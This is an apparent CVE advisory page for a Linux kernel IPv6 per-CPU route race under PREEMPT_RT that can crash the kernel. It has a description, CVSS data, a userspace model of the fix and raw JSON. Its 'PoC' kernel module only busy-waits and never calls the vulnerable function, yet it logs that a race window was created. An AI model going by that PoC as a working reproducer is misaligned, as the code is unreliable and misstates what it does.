Security Vulnerability Report
CVE-2025-71080 CVSS 5.5 MEDIUM

CVE-2025-71080

Published: 2026-01-13 16:16:08
Last Modified: 2026-03-25 19:42:23
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT

On PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the current task can be preempted. Another task running on the same CPU may then execute rt6_make_pcpu_route() and successfully install a pcpu_rt entry. When the first task resumes execution, its cmpxchg() in rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer NULL, triggering the BUG_ON(prev). It's easy to reproduce it by adding mdelay() after rt6_get_pcpu_route().

Using preempt_disable/enable is not appropriate here because ip6_rt_pcpu_alloc() may sleep.

Fix this by handling the cmpxchg() failure gracefully on PREEMPT_RT: free our allocation and return the existing pcpu_rt installed by another task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT kernels where such races should not occur.
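The fix pattern described above, modelled in userspace C11 as an added example; it is not the kernel's code or the upstream patch. `struct pcpu_rt`, `slot`, `make_pcpu_route()` and `replay_race()` are stand-in names assumed for illustration, and the two tasks are replayed in a fixed order rather than with real threads.

```c
#include <stdatomic.h>
#include <stdio.h>
#include <stdlib.h>

struct pcpu_rt { int owner; };          /* stand-in for a per-CPU route copy */
static _Atomic(struct pcpu_rt *) slot;  /* stand-in for this CPU's rt6i_pcpu */
static int live_allocs, lost_races;     /* bookkeeping for leak/race checks */

static struct pcpu_rt *rt_alloc(int owner)
{
    struct pcpu_rt *rt = malloc(sizeof(*rt));
    if (rt) { rt->owner = owner; live_allocs++; }
    return rt;
}

static void rt_free(struct pcpu_rt *rt) { if (rt) { free(rt); live_allocs--; } }

/* Allocate an entry and publish it only if the slot is still empty. */
static struct pcpu_rt *make_pcpu_route(int owner)
{
    struct pcpu_rt *mine = rt_alloc(owner), *prev = NULL;

    if (!mine)
        return NULL;
    if (atomic_compare_exchange_strong(&slot, &prev, mine))
        return mine;                    /* we won: the slot was NULL */
    /* Lost the race: prev now holds the other task's entry. The pre-fix
     * code asserted here (BUG_ON(prev)); the fix frees our copy instead. */
    lost_races++;
    rt_free(mine);
    return prev;
}

/* Replay the advisory's interleaving; returns the owner of the entry
 * that task A ends up using. */
static int replay_race(void)
{
    rt_free(atomic_exchange(&slot, (struct pcpu_rt *)NULL)); /* empty slot */
    lost_races = 0;
    struct pcpu_rt *a = atomic_load(&slot);  /* task A: lookup returns NULL */
    make_pcpu_route(2);                      /* A preempted; task B installs */
    if (!a)
        a = make_pcpu_route(1);              /* A resumes; its cmpxchg fails */
    return a ? a->owner : -1;
}

int main(void)
{
    int owner = replay_race();
    printf("task A uses the entry installed by task %d (lost_races=%d, live_allocs=%d)\n",
           owner, lost_races, live_allocs);
    return 0;
}
```

Task A ends up with task B's entry, its own allocation is released, and exactly one entry stays live, which is the outcome the description gives for the fixed PREEMPT_RT path.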

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions 6.12.1 up to, but excluding, 6.12.64) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions 6.13 up to, but excluding, 6.18.4) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.12:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 1adaea51c61b52e24e7ab38f7d3eba023b2d050d (stable)
Linux Kernel < 1dc33ad0867325f8d2c6d7b2a6f542d4f3121f66 (stable)
Linux Kernel < 787515ccb2292f82eb0876993129154629a49651 (stable)
Linux Kernel with PREEMPT_RT enabled (all versions prior to fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// PoC for CVE-2025-71080: race condition in rt6_get_pcpu_route()
// The race is reproduced by adding a delay after rt6_get_pcpu_route(),
// which increases the likelihood of the race condition occurring.
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/delay.h>
#include <net/net_namespace.h>
#include <net/ipv6.h>
#include <net/ip6_fib.h>
#include <net/route.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("POC Author");
MODULE_DESCRIPTION("PoC for CVE-2025-71080 - rt6_get_pcpu_route race condition");

static int __init cve_2025_71080_init(void)
{
	struct fib6_table *table;

	pr_info("CVE-2025-71080 PoC: Triggering race condition in rt6_get_pcpu_route\n");

	// Get the main IPv6 FIB table of the initial network namespace
	table = fib6_get_table(&init_net, RT6_TABLE_MAIN);
	if (!table) {
		pr_err("Failed to get FIB6 table\n");
		return -ENOENT;
	}

	// This module does not call rt6_get_pcpu_route() itself; the delay
	// below only stands in for the race window.
	// The vulnerability is triggered when:
	// 1. Thread A calls rt6_get_pcpu_route() -> returns NULL
	// 2. Thread A is preempted (on a PREEMPT_RT kernel)
	// 3. Thread B on the same CPU calls rt6_make_pcpu_route() -> installs pcpu_rt
	// 4. Thread A resumes -> cmpxchg() fails -> BUG_ON triggered
	mdelay(100); // busy-wait for 100 ms to simulate the race timing

	pr_info("PoC loaded. Race condition window created.\n");
	return 0;
}

static void __exit cve_2025_71080_exit(void)
{
	pr_info("CVE-2025-71080 PoC unloaded\n");
}

module_init(cve_2025_71080_init);
module_exit(cve_2025_71080_exit);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71080", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:07.550", "lastModified": "2026-03-25T19:42:22.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT\n\nOn PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the\ncurrent task can be preempted. Another task running on the same CPU\nmay then execute rt6_make_pcpu_route() and successfully install a\npcpu_rt entry. When the first task resumes execution, its cmpxchg()\nin rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer\nNULL, triggering the BUG_ON(prev). It's easy to reproduce it by adding\nmdelay() after rt6_get_pcpu_route().\n\nUsing preempt_disable/enable is not appropriate here because\nip6_rt_pcpu_alloc() may sleep.\n\nFix this by handling the cmpxchg() failure gracefully on PREEMPT_RT:\nfree our allocation and return the existing pcpu_rt installed by\nanother task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT\nkernels where such races should not occur."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nipv6: corregir un BUG en rt6_get_pcpu_route() bajo PREEMPT_RT\n\nEn kernels PREEMPT_RT, después de que rt6_get_pcpu_route() devuelve NULL, la tarea actual puede ser desalojada. Otra tarea ejecutándose en la misma CPU puede entonces ejecutar rt6_make_pcpu_route() e instalar exitosamente una entrada pcpu_rt. Cuando la primera tarea reanuda la ejecución, su cmpxchg() en rt6_make_pcpu_route() fallará porque rt6i_pcpu ya no es NULL, lo que activa el BUG_ON(prev). 
Es fácil reproducirlo añadiendo mdelay() después de rt6_get_pcpu_route().\n\nUsar preempt_disable/enable no es apropiado aquí porque ip6_rt_pcpu_alloc() puede dormir.\n\nSolucionar esto manejando el fallo de cmpxchg() de forma elegante en PREEMPT_RT: liberar nuestra asignación y devolver el pcpu_rt existente instalado por otra tarea. El BUG_ON es reemplazado por WARN_ON_ONCE para kernels que no son PREEMPT_RT donde tales condiciones de carrera no deberían ocurrir."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.12.1", "versionEndExcluding": "6.12.64", "matchCriteriaId": "087ADCE7-533D-4BFC-9FB3-A1872B77A2AA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.4", "matchCriteriaId": "DC988EA0-0E32-457A-BF95-89BEB31A227B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.12:-:*:*:*:*:*:*", "matchCriteriaId": "0E698080-7669-4132-8817-4C674EEBCE54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": 
"C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1adaea51c61b52e24e7ab38f7d3eba023b2d050d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/1dc33ad0867325f8d2c6d7b2a6f542d4f3121f66", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/st ... (truncated)